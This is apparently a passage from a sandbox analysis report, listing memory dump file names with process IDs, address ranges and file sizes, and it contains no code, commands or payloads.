memory/2784-453-0x0000000000000000-mapping.dmp
-
memory/2864-136-0x0000000000000000-mapping.dmp
-
memory/2864-141-0x000001EB8A510000-0x000001EB8A532000-memory.dmpFilesize
136KB
-
memory/2864-144-0x000001EBA2960000-0x000001EBA29D6000-memory.dmpFilesize
472KB
-
memory/2908-440-0x0000000000000000-mapping.dmp
-
memory/3028-179-0x0000000000000000-mapping.dmp
-
memory/3212-333-0x000002C6F2790000-0x000002C6F279A000-memory.dmpFilesize
40KB
-
memory/3212-277-0x0000000000000000-mapping.dmp
-
memory/3212-294-0x000002C6F2770000-0x000002C6F278C000-memory.dmpFilesize
112KB
-
memory/3212-300-0x000002C6F2B60000-0x000002C6F2C19000-memory.dmpFilesize
740KB
-
memory/3244-194-0x0000000000000000-mapping.dmp
-
memory/3432-176-0x0000000000000000-mapping.dmp
-
memory/3540-459-0x0000000000000000-mapping.dmp
-
memory/3540-193-0x0000000000000000-mapping.dmp
-
memory/3664-190-0x0000000000000000-mapping.dmp
-
memory/3908-449-0x000001E57E2A0000-0x000001E57E2A6000-memory.dmpFilesize
24KB
-
memory/3908-457-0x000001E57DB80000-0x000001E57DB87000-memory.dmpFilesize
28KB
-
memory/3968-243-0x0000000000000000-mapping.dmp
-
memory/3972-435-0x0000000000000000-mapping.dmp
-
memory/4004-443-0x0000000000000000-mapping.dmp
-
memory/4008-437-0x0000000000000000-mapping.dmp
-
memory/4028-434-0x0000000000000000-mapping.dmp
-
memory/4032-442-0x0000000000000000-mapping.dmp
-
memory/4156-461-0x0000000000000000-mapping.dmp
-
memory/4204-436-0x0000000000000000-mapping.dmp
-
memory/4236-183-0x0000000000000000-mapping.dmp
-
memory/4256-181-0x0000000000000000-mapping.dmp
-
memory/4308-182-0x0000000000000000-mapping.dmp
-
memory/4328-245-0x0000000000000000-mapping.dmp
-
memory/4360-244-0x0000000000000000-mapping.dmp
-
memory/4360-467-0x0000000000000000-mapping.dmp
-
memory/4452-185-0x0000000000000000-mapping.dmp
-
memory/4516-242-0x0000000000000000-mapping.dmp
-
memory/4588-462-0x000000014036EAC4-mapping.dmp
-
memory/4588-460-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4588-472-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4588-471-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4588-241-0x0000000000000000-mapping.dmp
-
memory/4588-465-0x0000000000DB0000-0x0000000000DD0000-memory.dmpFilesize
128KB
-
memory/4588-464-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4588-463-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/4604-458-0x0000000000000000-mapping.dmp
-
memory/4652-456-0x0000000000000000-mapping.dmp
-
memory/4664-439-0x0000000000000000-mapping.dmp
-
memory/4692-468-0x0000000000000000-mapping.dmp
-
memory/4768-246-0x0000000000000000-mapping.dmp
-
memory/4784-251-0x0000000000000000-mapping.dmp
-
memory/4804-432-0x0000000000000000-mapping.dmp
-
memory/4804-192-0x0000000000000000-mapping.dmp
-
memory/4824-429-0x0000000000000000-mapping.dmp
-
memory/4828-191-0x0000000000000000-mapping.dmp
-
memory/4884-428-0x0000000000000000-mapping.dmp
-
memory/4892-427-0x0000000000000000-mapping.dmp
-
memory/4928-188-0x0000000000000000-mapping.dmp
-
memory/4948-441-0x0000000000000000-mapping.dmp
-
memory/4976-425-0x0000000000000000-mapping.dmp
-
memory/4980-189-0x0000000000000000-mapping.dmp
-
memory/5080-184-0x0000000000000000-mapping.dmp
-
memory/5088-180-0x0000000000000000-mapping.dmp
-
memory/5100-433-0x0000000000000000-mapping.dmp